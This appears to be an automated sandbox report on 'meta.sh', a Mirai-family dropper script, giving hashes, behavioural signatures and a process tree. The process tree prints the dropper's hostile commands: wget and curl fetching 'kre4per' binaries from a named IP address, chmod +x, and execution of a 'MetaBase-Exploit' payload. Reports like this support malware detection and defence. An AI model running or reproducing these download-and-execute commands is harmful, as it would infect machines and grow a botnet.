Analysis
-
max time kernel
7s -
max time network
9s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
17-02-2025 10:22
Static task
static1
Behavioral task
behavioral1
Sample
meta.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
meta.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
meta.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
meta.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
meta.sh
-
Size
483B
-
MD5
79b512b0b1a43d26890e67dfb400c8c8
-
SHA1
e8db4e2ce94cdcd5f97a02be52968a336b60d784
-
SHA256
c41d5810be4537b41400f5aefb61ace955fe7f1bfc26a2bb0cd6144f38aa3679
-
SHA512
fade5a3df3df6074e13c0a15f858e005b5ddb353729f050b74179def4dd653cee66fe53f22a484d70064ce38755d4e555fcbde9fa8a27ea70f5e1be1e5257904
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 733 chmod 739 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/kraapje 734 meta.sh /tmp/kraapje 740 meta.sh -
description ioc Process File opened for reading /proc/filesystems cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/kre4per.x86 curl File opened for modification /tmp/kraapje meta.sh File opened for modification /tmp/kre4per.x86_64 wget File opened for modification /tmp/kre4per.x86_64 curl File opened for modification /tmp/busybox cp File opened for modification /tmp/kre4per.x86 wget
Processes
-
/tmp/meta.sh/tmp/meta.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:702 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:705
-
-
/usr/bin/wgetwget http://194.85.251.68/bins/kre4per.x862⤵
- Writes file to tmp directory
PID:709
-
-
/usr/bin/curlcurl -O http://194.85.251.68/bins/kre4per.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/catcat kre4per.x862⤵PID:732
-
-
/bin/chmodchmod +x busybox kraapje kre4per.x86 meta.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-CgPLid2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/kraapje./kraapje MetaBase-Exploit2⤵PID:734
-
-
/usr/bin/wgetwget http://194.85.251.68/bins/kre4per.x86_642⤵
- Writes file to tmp directory
PID:736
-
-
/usr/bin/curlcurl -O http://194.85.251.68/bins/kre4per.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/catcat kre4per.x86_642⤵PID:738
-
-
/bin/chmodchmod +x busybox kraapje kre4per.x86 kre4per.x86_64 meta.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-CgPLid2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/kraapje./kraapje MetaBase-Exploit2⤵PID:740
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
857KB
MD56ffc46165b5d9726a6607f3ea5305589
SHA1ab127220f42e816b413dde0d17031e251a7bc98f
SHA25680d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8
-
Filesize
61KB
MD5d2b8f3324a01bcc7b32944d8d8b84f81
SHA1ad898c85a87d9e44d6a88d900b23d350b545e8af
SHA2566bc122342cb7620b9e130b71869bcedd664c243fb8a63bb2f29a9c71cb48fce4
SHA512b8fc9a6c4a713cda10db85e1283f840de8e2a04546a20993c214a9768b8aa98172e810c148f4bf8ed90286fe9cf7b091eabf512ab0bf3681bef759ce9fa894ad
-
Filesize
53KB
MD57ffbdf8a1d617b2c93d5fc520ccb31cc
SHA15dbe3ceeb1e58a61671b74d040b809d343d24b53
SHA2567c3b7d80a9f95b61e3a56a62493c5f3336eabd766a17d2d07e28d01ec750f7eb
SHA5123de46ad924e9ceab846f2a09933a1cb654e5e70c8a4bf84d395c8492470b8bcc0afc838b3f4ceb8086c81e4beba5c2884bd59a202d6c682ae58c6d2a28766727